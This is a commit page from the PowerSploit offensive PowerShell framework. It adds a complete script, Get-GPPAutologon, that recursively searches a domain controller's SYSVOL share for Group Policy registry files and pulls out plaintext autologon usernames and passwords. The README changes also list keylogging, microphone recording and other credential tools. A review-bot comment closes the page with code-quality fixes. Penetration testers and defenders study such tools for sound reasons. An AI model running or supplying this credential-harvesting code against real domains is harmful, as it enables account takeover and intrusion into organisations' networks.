author | Oddvar Moe <oddvar.moe@advania.no> | 2016-11-21 20:16:02 +0100 |
---|---|---|
committer | Oddvar Moe <oddvar.moe@advania.no> | 2016-11-21 20:16:02 +0100 |
commit | de955ef270e9ba5073038e035f00da696cb9688c (patch) | |
tree | 94a989212f96a1de5725247059295fff9f87c3e6 | |
parent | 262a260865d408808ab332f972d410d3b861eff1 (diff) | |
download | PowerSploit-de955ef270e9ba5073038e035f00da696cb9688c.tar.gz PowerSploit-de955ef270e9ba5073038e035f00da696cb9688c.zip |
Added Get-GPPAutologon.ps1
-rw-r--r-- | Exfiltration/Exfiltration.psd1 | 3 | ||||
-rw-r--r-- | Exfiltration/Get-GPPAutologon.ps1 | 139 | ||||
-rw-r--r-- | README.md | 8 |
3 files changed, 149 insertions, 1 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
index da78493..a8cc113 100644
--- a/Exfiltration/Exfiltration.psd1
+++ b/Exfiltration/Exfiltration.psd1
@@ -31,6 +31,7 @@ FunctionsToExport = '*'
 FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
- 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml'
+ 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
+ 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
}
diff --git a/Exfiltration/Get-GPPAutologon.ps1 b/Exfiltration/Get-GPPAutologon.ps1
new file mode 100644
index 0000000..fd8978f
--- /dev/null
+++ b/Exfiltration/Get-GPPAutologon.ps1
@@ -0,0 +1,139 @@
+function Get-GPPAutologon
+{
+<#
+.SYNOPSIS
+
+ Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
+
+ PowerSploit Function: Get-GPPAutologon
+ Author: Oddvar Moe (@oddvarmoe)
+ Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
+
+.EXAMPLE
+
+ PS C:\> Get-GPPAutolgon
+
+ UserNames File Passwords
+ --------- ---- ---------
+ {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
+ {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
+
+
+.EXAMPLE
+
+ PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
+
+ password
+ password12
+ password123
+ password1234
+ password1234$
+ read123
+ Recycling*3ftw!
+
+.LINK
+
+ https://support.microsoft.com/nb-no/kb/324737
+#>
+
+ [CmdletBinding()]
+ Param ()
+
+ #Some XML issues between versions
+ Set-StrictMode -Version 2
+
+ #define helper function to parse fields from xml files
+ function Get-GPPInnerFields
+ {
+ [CmdletBinding()]
+ Param (
+ $File
+ )
+
+ try
+ {
+ $Filename = Split-Path $File -Leaf
+ [xml] $Xml = Get-Content ($File)
+
+ #declare empty arrays
+ $Password = @()
+ $UserName = @()
+
+ #check for password and username field
+ if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
+ {
+ $props = $xml.GetElementsByTagName("Properties")
+ foreach($prop in $props)
+ {
+ switch ($prop.name)
+ {
+ 'DefaultPassword'
+ {
+ $Password += , $prop | Select-Object -ExpandProperty Value
+ }
+
+ 'DefaultUsername'
+ {
+ $Username += , $prop | Select-Object -ExpandProperty Value
+ }
+ }
+
+ Write-Verbose "Potential password in $File"
+ }
+
+ #put [BLANK] in variables
+ if (!($Password))
+ {
+ $Password = '[BLANK]'
+ }
+
+ if (!($UserName))
+ {
+ $UserName = '[BLANK]'
+ }
+
+ #Create custom object to output results
+ $ObjectProperties = @{'Passwords' = $Password;
+ 'UserNames' = $UserName;
+ 'File' = $File}
+
+ $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
+ Write-Verbose "The password is between {} and may be more than one value."
+ if ($ResultsObject)
+ {
+ Return $ResultsObject
+ }
+ }
+ }
+ catch {Write-Error $Error[0]}
+ }
+
+ try {
+ #ensure that machine is domain joined and script is running as a domain account
+ if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
+ throw 'Machine is not a domain member or User is not a member of the domain.'
+ }
+
+ #discover potential registry.xml containing autologon passwords
+ Write-Verbose 'Searching the DC. This could take a while.'
+ $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
+
+ if ( -not $XMlFiles ) {throw 'No preference files found.'}
+
+ Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
+
+ foreach ($File in $XMLFiles) {
+ $Result = (Get-GppInnerFields $File.Fullname)
+ Write-Output $Result
+ }
+ }
+
+ catch {Write-Error $Error[0]}
+}
\ No newline at end of file
@@ -100,6 +100,10 @@ Logs keys pressed, time and the active window.
 Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
+#### `Get-GPPAutologon`
+
+Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
+
 #### `Get-TimedScreenshot`
 A function that takes screenshots at a regular interval and saves them to a folder.
@@ -128,6 +132,10 @@ Displays Windows vault credential objects including cleartext web credentials.
 Generates a full-memory minidump of a process.
+#### 'Get-MicrophoneAudio'
+
+Records audio from system microphone and saves to disk
+
 ## Mayhem
 **Cause general mayhem with PowerShell.** |
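Review bot: The comment-based help misspells the function's own name twice — `.DESCRIPTION` reads `Get-GPPAutologn` and the first `.EXAMPLE` shows `PS C:\> Get-GPPAutolgon` — so the example cannot be run as written; both should read `Get-GPPAutologon`. Inside Get-GPPInnerFields, `$Filename = Split-Path $File -Leaf` is assigned but never read, and `Write-Verbose "Potential password in $File"` sits in the `foreach($prop in $props)` body after the `switch`, so it fires once per `Properties` element whether or not a `DefaultPassword` entry was matched; moving it into the `'DefaultPassword'` arm makes the verbose output reflect an actual hit. The `[BLANK]` fallbacks assign a bare string where a match yields an array, so the `Passwords` and `UserNames` properties change shape from one result to the next; `$Password = @('[BLANK]')` and `$UserName = @('[BLANK]')` keep them consistently arrays for callers that index into them.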